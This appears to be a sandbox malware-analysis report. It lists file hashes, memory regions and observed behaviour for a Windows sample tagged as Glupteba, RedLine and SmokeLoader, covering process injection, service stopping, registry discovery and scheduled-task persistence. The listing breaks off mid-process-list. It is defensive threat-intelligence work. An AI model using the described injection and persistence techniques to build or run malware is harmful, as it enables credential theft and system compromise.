C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 26940ab29f62546528674050d9a558fe
SHA1 b3e4afc1bae6447e1b4d0b517fcc9b05c8552858
SHA256 045d5a2d6ea09b0719120ba8141a5c554474bd6e7675f527271eb62c90d3de47
SHA512 d245446e66d68be6f8108d38c056b30af0274b307d7028a3144fabbcd9f72cb72ac27e45306b5d2bb177eb5fad2893196c6fc02be7fbf54b0c72a21cddace086

\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 7d28225ff55f909ed3a56d7d193028a9
SHA1 9ce6d62ecc01489c4179265ef19bb4aac80c0566
SHA256 1408d85ca9d207ee0a752e4e421d7a470ae7c13c3407632516bfe4c575256be3
SHA512 d095e9cfa55f103fae6cceb0623b3fa060454cfa35979da66ec849b3d153ae38f517b594a62e4a12a97b7dfbd0dc193d6d0f22d53c325ec32590d4b7c425fb78

C:\Users\Admin\AppData\Local\Temp\Broom.exe

MD5 8e993177ae0496cc9bf169e241f00c97
SHA1 682a8c6ccb017f59391b8e51f45dd772f5b8185b
SHA256 9ddd09ddd664c681461bd75a0f86d07555b76ea9cca3c02b1bcb7ccd200bfba5
SHA512 3058e7ddc1670a7e16792cd6bad374dcac438201977e684ba7d6d7c01943d8ff05a5613940eef698d96fb8d31416f5aca71ed6b12d2c748ad23d7e9cb83eb049

memory/2472-75-0x0000000074EA0000-0x000000007558E000-memory.dmp

\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 c13946f8ad545e9e8302628e93075ef2
SHA1 b910126de0eb989a11748285b9aef13cd7b2d1f0
SHA256 13b3f6a2e8c49338958baf03eb2e21ec94a59d3490d93a1cb5fa12545d9baf14
SHA512 ef46c93c6f6512d8af56903419aaf3c4d5f48a85f1a87e05906c2a775d0fc059627609dc50cab85635149a0825ba237f4d242de07d3a0c95aaaf71a6df68b4bb

C:\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp

MD5 bf8954438063af593410ff23b8807508
SHA1 469cf468659611867defc2f60d07578b513f69a8
SHA256 5aa3033e0016d2bb9be8f7c5254389050649def1468c70374dfd4cd63e0c3297
SHA512 a51be18f5c0ec91e42e66c15410e8cdfacd3531cc130aa100f987e19c5854d4c3c6dc7b7462409280d9aa297f58b93ff8a58f595eb4dbc207e9e6f14ae466af0

\Users\Admin\AppData\Local\Temp\is-8A7OE.tmp\tuc3.tmp

MD5 bc747f367ad07031f6d310b2c68430a4
SHA1 f9a3e6a2e0986cecf295b4278f4b47ae1304c9e8
SHA256 c74f3916664cd8aedc2c7eb063090261f32f76ce467cb15ba25b1c22b786f38c
SHA512 87b9ff11f1278a8ddee26b58c4f10673a37dc93a92c7db5f4a8228cf1d46823c8bc6768e78187b37815f5f23c3ab57252c7eda660f2656bcbed5ed774151e3d2

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 31fc9f2e083c0ca26bfc3ccf49a0ac43
SHA1 867b6ccb6eeed560d0b335d94030db34ea981963
SHA256 2eb70189c8a4a9202a6e5d5932ee1c2621fa75bdc1f4fddfc24936ad5eea8cc5
SHA512 8fd5a888e3b149e7f9cb515ac1f276160e8eaf9e7b44d77ae2ef5235b5c27d36f157c1e1e224d58b960e19f60d69d22b471d653297397a3e86a7f516c534a316

memory/1784-104-0x00000000001D0000-0x00000000001D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-FU4AD.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2796-106-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/3024-105-0x0000000000230000-0x0000000000231000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-FU4AD.tmp\_isetup\_isdecmp.dll

MD5 a813d18268affd4763dde940246dc7e5
SHA1 c7366e1fd925c17cc6068001bd38eaef5b42852f
SHA256 e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64
SHA512 b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

\Users\Admin\AppData\Local\Temp\is-FU4AD.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\??\c:\users\admin\appdata\local\temp\is-8a7oe.tmp\tuc3.tmp

MD5 b0006be6d3eeeee1e448b578d3622baf
SHA1 9db597d2b477fab7bdb5c4d06a31461f270207f2
SHA256 6e411e1b4c94ce5730fbc6735ae105da5f99d606e2a816f9936caefc2d6f2b24
SHA512 bb396f46e562deefbe2e8938ec363e70bdbcfcc917e6aaea1aebff4b932ecf1acb4993b579d3e651a323fc80a4485a5a8457d6a757091f305e9003ba568855c4

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 252a44a5b707501d910ecaddaae97dea
SHA1 1c7e948c528713bca3d268f183ce2884864e16e0
SHA256 05e545736df8a13a8a18015330d5c2f98038fd9d4f22449afe24c943d2030fe3
SHA512 358062a073850a66b887397001bb1ef88a7d9bf21769764837a028298325c54e0c1cd9812cd2b1b90c23813da757337f46391dc07a1b7e367ec4f4501d3bb4c1

memory/2928-114-0x0000000074EA0000-0x000000007558E000-memory.dmp

memory/2928-113-0x0000000000390000-0x00000000003CC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

MD5 dbcddd412342a03622d1b2b163708667
SHA1 33e958e343b8784b68029031b0e334ae781b4f4e
SHA256 c5d899f5889efd0a4c098b341198deb4c5cde4f2948776154e8d54c26af53e2a
SHA512 8872183973eb1d0cdbf134bee7f9c98cf6cb92672f85d5a3f7b7ba2c2e1d4c54fbd18d6186e6071243963e3b9fdd9f19a91f3d68fc3429d24cf83e84b5552eb0

C:\Users\Admin\AppData\Local\Temp\FEEA.exe

MD5 f2fc193c6ef77b9375d231cdb0f18e97
SHA1 f5a1718fa94dd5b2c8e87e565ed5535654ff2450
SHA256 5e6a482609c87559aff46965361a5f01040c7d073dcadf1c3650e70dece26d88
SHA512 2659f3477e0645c6523cf5a4b35be20d82bbe6e5ed62afb3d97e2f125580bc74e0ebb41bc4bcadd016c211f46a05640b94bb90254ba54af00053e6c58ae0d8a6

\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 d122e3b2b89eb6a7556953be54809af6
SHA1 cec8d0f094355d8e43563caf16aa4a83bdeea20e
SHA256 5dd7dd91a155a3d6b7ead98eeaf14d6af56fc7d91d05c6e1f02222e46852b3d4
SHA512 5d41f1b590ea9e689275ce3d49efc2addcbecfcac5862003133085be8f36fa4e1eb9f5706c444a31cde7223981bcb34dd85ec03597be04e06a36b6a6c268bfdc

memory/2796-116-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/2796-117-0x0000000002AC0000-0x00000000033AB000-memory.dmp

memory/2928-115-0x0000000007180000-0x00000000071C0000-memory.dmp

memory/2796-118-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/2724-127-0x0000000000220000-0x0000000000229000-memory.dmp

memory/412-128-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2724-126-0x00000000008A2000-0x00000000008B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 d4ad09094d0641969ebee18830efa370
SHA1 14dfc5edda6ad1613f851868523a36efec0809c6
SHA256 8543f1d8146053fb26d4f692ca7f82fc56a28d8a6f9e5904b8064ed383b302bf
SHA512 47118f1d2193bc6b96e97c6c39cb6b0ee409d51ee3a8e1c0d5e4570998dfeb5e0324561489629a8314c3c086c43712b61693d36f1d587ecfac44c1cf1dde15ed

memory/412-124-0x0000000000400000-0x0000000000409000-memory.dmp

memory/412-122-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 9c554b93921ec9d52ff9f0bda8b3b937
SHA1 c8a76e9c547e0590aadfa529c1c3bf3e89ab3bcb
SHA256 4f323ec9b994e6cf65d198bf9a77efe80000d8dd64a006992f0c0af8cd0e8e4e
SHA512 267455443b4086efa76e829d72860bdefaf919c39da63738c77a7f2871da7f559bf0bb31ef30ad912d1e59d5ad78745e968e6b6d652b8360f884cf46224a6dd5

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 8f1a56a5830905cbbde46bff6ab66588
SHA1 fecdeef425d60fe21f374bdd3405685245b64e4a
SHA256 a159d2e6172a0e1ca403d11575131cef6d1a956b9f7a34f3ebc4e98a056d59b3
SHA512 a0bf5b8e31514a53bbbe9fe5a6d9f6dfdfaefbdf2f7741c03968de632901ace81177430407253dce15ca0c1d6c7d33f52ad6a7d54724ca32ae81d31bdc46fa0c

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 fa21349afce08f321ed1b5378c404b1d
SHA1 d01d582e048c070430647830b335db54eaf470fc
SHA256 059acb7d0d2144ad29c3a668693fe9fb5cdf6501cd82d18a678650ced7824b41
SHA512 2ffdff2e3f45df2afbe42f505e2ee758239397f6584152e002229e60b3a44382a32f552121072a83d2962f694c5132b006a46e6028690602a9a1e99e9320c879


Analysis: behavioral2

Detonation Overview

Submitted: 2023-12-11 10:55

Reported: 2023-12-11 10:57

Platform: win10v2004-20231127-en

Max time kernel: 121s

Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3635043082-2972811465-3176142135-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9438.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A N/A N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4632 set thread context of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JR7S3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-UHCH4.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TKQK2.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-J225L.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-6HA0E.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-O09NH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-LKG32.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-OPU6H.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JTNOC.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-T4H87.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-PG79Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-56FP5.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-P7QHH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-7A8FF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-VP10Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-HTCD4.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JS30A.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-UA3CG.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-2R912.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TONQ3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-AC188.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-75DRS.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SC8LN.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-HNVCA.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-NRF0U.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-M3DEL.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-C1LN7.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-8E9TH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-N29E6.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TUP7T.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-773TJ.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-S6NSF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\plugins\internal\is-FLJO1.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\is-DFEK0.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GS1DF.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-H37O2.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-M60G9.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-Q3N15.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\lessmsi\is-HNIOE.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-P4P8Q.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\install\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SKAJ1.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-4TASE.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\install\is-9TPRH.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-19AA3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File opened for modification C:\Program Files (x86)\xrecode3\install\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-08BFP.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GQ6OM.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-33U2U.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-SDNEI.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-PIJ7J.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-34674.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-JAT3P.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\stuff\is-74KT5.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-205VN.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-53DRO.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-GFECJ.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-537HK.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-TAJQS.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File opened for modification C:\Program Files (x86)\xrecode3\xrecode3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-01OB0.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-IIB1J.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A
File created C:\Program Files (x86)\xrecode3\bin\x86\is-V9BA3.tmp C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4608 N/A N/A C:\Users\Admin\AppData\Local\Temp\9630.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 4540 N/A N/A C:\Users\Admin\AppData\Local\Temp\9438.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 3384 wrote to memory of 844 N/A N/A C:\Users\Admin\AppData\Local\Temp\A04F.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 660 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4632 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4840 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 4540 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\tuc3.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 660 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe C:\Users\Admin\AppData\Local\Temp\Broom.exe
PID 4540 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4540 wrote to memory of 3332 N/A C:\Users\Admin\AppData\Local\Temp\9438.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe
PID 4700 wrote to memory of 4880 N/A C:\Users\Admin\AppData\Local\Temp\tuc3.exe C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp
PID 4880 wrote to memory of 4120 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\schtasks.exe
PID 4880 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4880 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Windows\SysWOW64\net.exe
PID 4880 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\is-Q1TSP.tmp\tuc3.tmp C:\Program Files (x86)\xrecode3\xrecode3.exe
PID 4632 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
PID 4308 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe

"C:\Users\Admin\AppData\Local\Temp\0x0006000000023234-4438.exe"

C:\Users\Admin\AppData\Local\Temp\9630.exe

C:\Users\Admin\AppData\Local\Temp\9630.exe

C:\Users\Admin\AppData\Local\Temp\9438.exe

C:\Users\Admin\AppData\Local\Temp\9438.exe

C:\Users\Admin\AppData\Local\Temp\A04F.exe

